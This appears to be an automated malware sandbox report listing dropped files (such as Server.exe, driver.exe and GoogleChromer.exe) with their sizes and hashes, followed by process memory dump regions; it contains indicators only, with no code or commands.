Filesize
4.9MB

MD5
1528714ebf9ec93106e200719e94239f

SHA1
9321ca4531d1384bcb8f9d95b574148dbd8e8a4a

SHA256
064331c558242898b53bbbfe2ef22bc0bb908ffa5a106fe3f45866acfccfae5c

SHA512
a2d69bd0a3063efe3ba461b7ca1e48e20a2aed623aa8b1fb6e0692c0008649e5c7c8ad053f5d37512574de4dbdbed4bd675aa89267b67db69ee839450e66f71a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
1KB

MD5
4cc9e7069534f7bcbb90ad7cac69ed78

SHA1
a3522b9edd4a7d28ad0ac0e1b659a82b6dc10892

SHA256
4814be12fd2320cd9249d3b2611ea1421cb88823097fcbf0ca697e6e9ac93c9c

SHA512
e408e0abb3b7166578c075d10f1378d6a6b39dc386361a4df23abc026e9a634bfb16c01daf9b8fcbe8555e335d93c8c9d8442a11c187df616f2d6cdd3ab53653

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
17KB

MD5
3f1e518a0c180b8e3a388e067fd67c36

SHA1
fa285c197772e58c39199f104dda01168829662c

SHA256
7b161a9ed5c293f5f16797421edb612925587233227d238c97e922f5e4e3e9ea

SHA512
ba55721eb86ddf46c0c92aaf19264488f5273999f82ed1ae008cfdae78bf344c9e075715dc0f0cda8514f53863b2afe9370abbf8b4e495f32032cc8de1acd636

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
d0cc704642db04ee71f55c81d8638f26

SHA1
ea36a39c170f47519db909e7e6a6eaa48c94f0fd

SHA256
727cd0540415e1af7a593b876424adec54b8e1f19e290cfab4de0e4aef91626c

SHA512
598ca16043dab2a89d22b3de9f476e44e6577ff00dc11e74c2471804420bdf0df1378cb6acb7c1934e732bfb87817008729e6613cd35ded9b92b9b6075c7e509

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
d4885e4e39b73099c74e2aace1203503

SHA1
8e989d31404f8dae91454c1ea1257d483860bb1f

SHA256
19fd4b150380e8e7a0f693a98cddd30afd349af9f3eba1973e5a822954bacbc2

SHA512
fedc761a36af192871d86bd371d5ed7c0803ccb931f4cf477120c8bfb539c27d09353d66b05ebeb4c4ef5b183ca3d3d7512f978fa9c62295722588b0936d5e56

Download Submit
C:\Users\Admin\AppData\Local\Temp\Server.exe
Filesize
37KB

MD5
333baef68bf06e2bff8c785f9120559d

SHA1
b605cc35ec178240b1150a81d73e58d1d9417bac

SHA256
4d62a9ab6abeeafd08fc299581c0910c36ccf64178c16fc06b4a57a48858e1d4

SHA512
0ba29d931b3166c4d334cd45f02cc053efbe2f1db3dc844a43e8f9b12a6efea3d73d45d49ab048fdd7b21495b8bbe1929b560ead99890d88f02b99fda186c1cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\Server.exe
Filesize
37KB

MD5
333baef68bf06e2bff8c785f9120559d

SHA1
b605cc35ec178240b1150a81d73e58d1d9417bac

SHA256
4d62a9ab6abeeafd08fc299581c0910c36ccf64178c16fc06b4a57a48858e1d4

SHA512
0ba29d931b3166c4d334cd45f02cc053efbe2f1db3dc844a43e8f9b12a6efea3d73d45d49ab048fdd7b21495b8bbe1929b560ead99890d88f02b99fda186c1cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\driver.exe
Filesize
4.9MB

MD5
1528714ebf9ec93106e200719e94239f

SHA1
9321ca4531d1384bcb8f9d95b574148dbd8e8a4a

SHA256
064331c558242898b53bbbfe2ef22bc0bb908ffa5a106fe3f45866acfccfae5c

SHA512
a2d69bd0a3063efe3ba461b7ca1e48e20a2aed623aa8b1fb6e0692c0008649e5c7c8ad053f5d37512574de4dbdbed4bd675aa89267b67db69ee839450e66f71a

Download Submit
C:\Users\Admin\AppData\Local\Temp\driver.exe
Filesize
4.9MB

MD5
1528714ebf9ec93106e200719e94239f

SHA1
9321ca4531d1384bcb8f9d95b574148dbd8e8a4a

SHA256
064331c558242898b53bbbfe2ef22bc0bb908ffa5a106fe3f45866acfccfae5c

SHA512
a2d69bd0a3063efe3ba461b7ca1e48e20a2aed623aa8b1fb6e0692c0008649e5c7c8ad053f5d37512574de4dbdbed4bd675aa89267b67db69ee839450e66f71a

Download Submit
C:\Users\Admin\AppData\Roaming\GoogleChromer.exe
Filesize
37KB

MD5
333baef68bf06e2bff8c785f9120559d

SHA1
b605cc35ec178240b1150a81d73e58d1d9417bac

SHA256
4d62a9ab6abeeafd08fc299581c0910c36ccf64178c16fc06b4a57a48858e1d4

SHA512
0ba29d931b3166c4d334cd45f02cc053efbe2f1db3dc844a43e8f9b12a6efea3d73d45d49ab048fdd7b21495b8bbe1929b560ead99890d88f02b99fda186c1cc

Download Submit
C:\Users\Admin\AppData\Roaming\GoogleChromer.exe
Filesize
37KB

MD5
333baef68bf06e2bff8c785f9120559d

SHA1
b605cc35ec178240b1150a81d73e58d1d9417bac

SHA256
4d62a9ab6abeeafd08fc299581c0910c36ccf64178c16fc06b4a57a48858e1d4

SHA512
0ba29d931b3166c4d334cd45f02cc053efbe2f1db3dc844a43e8f9b12a6efea3d73d45d49ab048fdd7b21495b8bbe1929b560ead99890d88f02b99fda186c1cc

Download Submit
memory/224-201-0x0000000000000000-mapping.dmp

Download
memory/224-202-0x0000021465530000-0x0000021465552000-memory.dmp

Filesize
136KB

Download
memory/224-204-0x00007FF83E8B0000-0x00007FF83F371000-memory.dmp

Filesize
10.8MB

Download
memory/224-211-0x00007FF83E8B0000-0x00007FF83F371000-memory.dmp

Filesize
10.8MB

Download
memory/1004-279-0x00007FF83E8B0000-0x00007FF83F371000-memory.dmp

Filesize
10.8MB

Download
memory/1004-272-0x00000207DF6D0000-0x00000207DF6D7000-memory.dmp

Filesize
28KB

Download
memory/1004-273-0x00007FF83E8B0000-0x00007FF83F371000-memory.dmp

Filesize
10.8MB

Download
memory/1688-212-0x0000000000000000-mapping.dmp

Download
memory/1832-141-0x0000000000000000-mapping.dmp

Download
memory/2620-197-0x0000000006E90000-0x0000000006E9A000-memory.dmp

Filesize
40KB

Download
memory/2620-190-0x00000000060C0000-0x00000000060DE000-memory.dmp

Filesize
120KB

Download
memory/2620-143-0x0000000000000000-mapping.dmp

Download
memory/2620-207-0x00000000070A0000-0x00000000070A8000-memory.dmp

Filesize
32KB

Download
memory/2620-205-0x0000000007060000-0x000000000706E000-memory.dmp

Filesize
56KB

Download
memory/2620-200-0x00000000070B0000-0x0000000007146000-memory.dmp

Filesize
600KB

Download
memory/2620-189-0x00000000707D0000-0x000000007081C000-memory.dmp

Filesize
304KB

Download
memory/2620-188-0x00000000060E0000-0x0000000006112000-memory.dmp

Filesize
200KB

Download
memory/2620-206-0x0000000007150000-0x000000000716A000-memory.dmp

Filesize
104KB

Download
memory/2880-138-0x0000000000000000-mapping.dmp

Download
memory/2936-142-0x0000000000000000-mapping.dmp

Download
memory/2984-130-0x0000000000000000-mapping.dmp

Download
memory/3044-277-0x0000000000000000-mapping.dmp

Download
memory/3192-209-0x0000000000000000-mapping.dmp

Download
memory/3192-218-0x00000000707D0000-0x000000007081C000-memory.dmp

Filesize
304KB

Download
memory/3300-262-0x00007FF774490000-0x00007FF7754B0000-memory.dmp

Filesize
16.1MB

Download
memory/3300-276-0x00007FF4C4F10000-0x00007FF4C52E1000-memory.dmp

Filesize
3.8MB

Download
memory/3300-259-0x00007FF774490000-0x00007FF7754B0000-memory.dmp

Filesize
16.1MB

Download
memory/3300-225-0x0000000000000000-mapping.dmp

Download
memory/3300-260-0x00007FF4C4F10000-0x00007FF4C52E1000-memory.dmp

Filesize
3.8MB

Download
memory/3300-255-0x00007FF85CDA0000-0x00007FF85CDB0000-memory.dmp

Filesize
64KB

Download
memory/3300-261-0x00007FF774490000-0x00007FF7754B0000-memory.dmp

Filesize
16.1MB

Download
memory/3300-275-0x00007FF83E8B0000-0x00007FF83F371000-memory.dmp

Filesize
10.8MB

Download
memory/3300-263-0x00007FF85CE90000-0x00007FF85CEA0000-memory.dmp

Filesize
64KB

Download
memory/3300-274-0x00007FF774490000-0x00007FF7754B0000-memory.dmp

Filesize
16.1MB

Download
memory/3300-264-0x00007FF83E8B0000-0x00007FF83F371000-memory.dmp

Filesize
10.8MB

Download
memory/3300-271-0x0000000002670000-0x0000000002682000-memory.dmp

Filesize
72KB

Download
memory/3948-223-0x0000000070150000-0x0000000070701000-memory.dmp

Filesize
5.7MB

Download
memory/3948-217-0x0000000000000000-mapping.dmp

Download
memory/3948-278-0x0000000070150000-0x0000000070701000-memory.dmp

Filesize
5.7MB

Download
memory/3984-139-0x0000000008190000-0x000000000880A000-memory.dmp

Filesize
6.5MB

Download
memory/3984-137-0x0000000006930000-0x000000000694E000-memory.dmp

Filesize
120KB

Download
memory/3984-151-0x0000000007D00000-0x0000000007D92000-memory.dmp

Filesize
584KB

Download
memory/3984-131-0x0000000000000000-mapping.dmp

Download
memory/3984-148-0x0000000008DC0000-0x0000000009364000-memory.dmp

Filesize
5.6MB

Download
memory/3984-132-0x0000000003380000-0x00000000033B6000-memory.dmp

Filesize
216KB

Download
memory/3984-140-0x0000000006E50000-0x0000000006E6A000-memory.dmp

Filesize
104KB

Download
memory/3984-133-0x0000000005B30000-0x0000000006158000-memory.dmp

Filesize
6.2MB

Download
memory/3984-135-0x0000000006160000-0x00000000061C6000-memory.dmp

Filesize
408KB

Download
memory/3984-136-0x00000000061D0000-0x0000000006236000-memory.dmp

Filesize
408KB

Download
memory/3984-134-0x0000000005A60000-0x0000000005A82000-memory.dmp

Filesize
136KB

Download
memory/4344-221-0x0000000070150000-0x0000000070701000-memory.dmp

Filesize
5.7MB

Download
memory/4344-173-0x0000000070150000-0x0000000070701000-memory.dmp

Filesize
5.7MB

Download
memory/4344-147-0x0000000000000000-mapping.dmp

Download
memory/4432-186-0x00007FF7784E0000-0x00007FF779500000-memory.dmp

Filesize
16.1MB

Download
memory/4432-174-0x00007FF85CB00000-0x00007FF85CB10000-memory.dmp

Filesize
64KB

Download
memory/4432-193-0x00007FF85CE60000-0x00007FF85CE70000-memory.dmp

Filesize
64KB

Download
memory/4432-198-0x00007FF85CE60000-0x00007FF85CE70000-memory.dmp

Filesize
64KB

Download
memory/4432-194-0x00007FF85CE60000-0x00007FF85CE70000-memory.dmp

Filesize
64KB

Download
memory/4432-195-0x00007FF85CE60000-0x00007FF85CE70000-memory.dmp

Filesize
64KB

Download
memory/4432-199-0x00007FF85CE60000-0x00007FF85CE70000-memory.dmp

Filesize
64KB

Download
memory/4432-192-0x00007FF85CE60000-0x00007FF85CE70000-memory.dmp

Filesize
64KB

Download
memory/4432-191-0x00007FF83E8B0000-0x00007FF83F371000-memory.dmp

Filesize
10.8MB

Download
memory/4432-187-0x00007FF85CE90000-0x00007FF85CEA0000-memory.dmp

Filesize
64KB

Download
memory/4432-185-0x00007FF7784E0000-0x00007FF779500000-memory.dmp

Filesize
16.1MB

Download
memory/4432-184-0x00007FF7784E0000-0x00007FF779500000-memory.dmp

Filesize
16.1MB

Download
memory/4432-183-0x00007FF7784E0000-0x00007FF7784E2000-memory.dmp

Filesize
8KB

Download
memory/4432-182-0x00007FF85CDA0000-0x00007FF85CDB0000-memory.dmp

Filesize
64KB

Download
memory/4432-179-0x00007FF85CB00000-0x00007FF85CB10000-memory.dmp

Filesize
64KB

Download
memory/4432-181-0x00007FF85CDA0000-0x00007FF85CDB0000-memory.dmp

Filesize
64KB

Download
memory/4432-180-0x00007FF85CB00000-0x00007FF85CB10000-memory.dmp

Filesize
64KB

Download
memory/4432-176-0x00007FF85CB00000-0x00007FF85CB10000-memory.dmp

Filesize
64KB

Download
memory/4432-213-0x00007FF7784E0000-0x00007FF779500000-memory.dmp

Filesize
16.1MB

Download
memory/4432-214-0x00007FF40BB30000-0x00007FF40BF01000-memory.dmp

Filesize
3.8MB

Download
memory/4432-215-0x00007FF83E8B0000-0x00007FF83F371000-memory.dmp

Filesize
10.8MB

Download
memory/4432-144-0x0000000000000000-mapping.dmp

Download
memory/4432-178-0x00007FF85CB00000-0x00007FF85CB10000-memory.dmp

Filesize
64KB

Download
memory/4432-177-0x00007FF85CB00000-0x00007FF85CB10000-memory.dmp

Filesize
64KB

Download
memory/4432-175-0x00007FF85CB00000-0x00007FF85CB10000-memory.dmp

Filesize
64KB

Download
memory/4432-196-0x00007FF85CE60000-0x00007FF85CE70000-memory.dmp

Filesize
64KB

Download
memory/4432-166-0x00007FF85CB00000-0x00007FF85CB10000-memory.dmp

Filesize
64KB

Download
memory/4432-152-0x00007FF85CB00000-0x00007FF85CB10000-memory.dmp

Filesize
64KB

Download
memory/4432-172-0x00007FF85CB00000-0x00007FF85CB10000-memory.dmp

Filesize
64KB

Download
memory/4432-171-0x00007FF85CB00000-0x00007FF85CB10000-memory.dmp

Filesize
64KB

Download
memory/4432-170-0x00007FF40BB30000-0x00007FF40BF01000-memory.dmp

Filesize
3.8MB

Download
memory/4432-169-0x00007FF85CB00000-0x00007FF85CB10000-memory.dmp

Filesize
64KB

Download
memory/4432-153-0x00007FF85CB00000-0x00007FF85CB10000-memory.dmp

Filesize
64KB

Download
memory/4432-168-0x00007FF85CB00000-0x00007FF85CB10000-memory.dmp

Filesize
64KB

Download
memory/4432-159-0x00007FF85CB00000-0x00007FF85CB10000-memory.dmp

Filesize
64KB

Download
memory/4432-167-0x00007FF7784E0000-0x00007FF779500000-memory.dmp

Filesize
16.1MB

Download
memory/4432-165-0x00007FF85CB00000-0x00007FF85CB10000-memory.dmp

Filesize
64KB

Download
memory/4432-160-0x00007FF85CB00000-0x00007FF85CB10000-memory.dmp

Filesize
64KB

Download
memory/4432-164-0x00007FF85CB00000-0x00007FF85CB10000-memory.dmp

Filesize
64KB

Download
memory/4432-163-0x00007FF85CB00000-0x00007FF85CB10000-memory.dmp

Filesize
64KB

Download
memory/4432-161-0x00007FF85CB00000-0x00007FF85CB10000-memory.dmp

Filesize
64KB

Download
memory/4432-162-0x00007FF85CB00000-0x00007FF85CB10000-memory.dmp

Filesize
64KB

Download
memory/4432-156-0x00007FF85CB00000-0x00007FF85CB10000-memory.dmp

Filesize
64KB

Download
memory/4432-158-0x00007FF85CB00000-0x00007FF85CB10000-memory.dmp

Filesize
64KB

Download
memory/4432-157-0x00007FF85CB00000-0x00007FF85CB10000-memory.dmp

Filesize
64KB

Download
memory/4432-155-0x00007FF85CB00000-0x00007FF85CB10000-memory.dmp

Filesize
64KB

Download
memory/4432-154-0x00007FF85CB00000-0x00007FF85CB10000-memory.dmp

Filesize
64KB

Download
memory/4848-216-0x0000000000000000-mapping.dmp

Download
memory/5116-227-0x00007FF83E8B0000-0x00007FF83F371000-memory.dmp

Filesize
10.8MB

Download
memory/5116-222-0x00007FF83E8B0000-0x00007FF83F371000-memory.dmp

Filesize
10.8MB

Download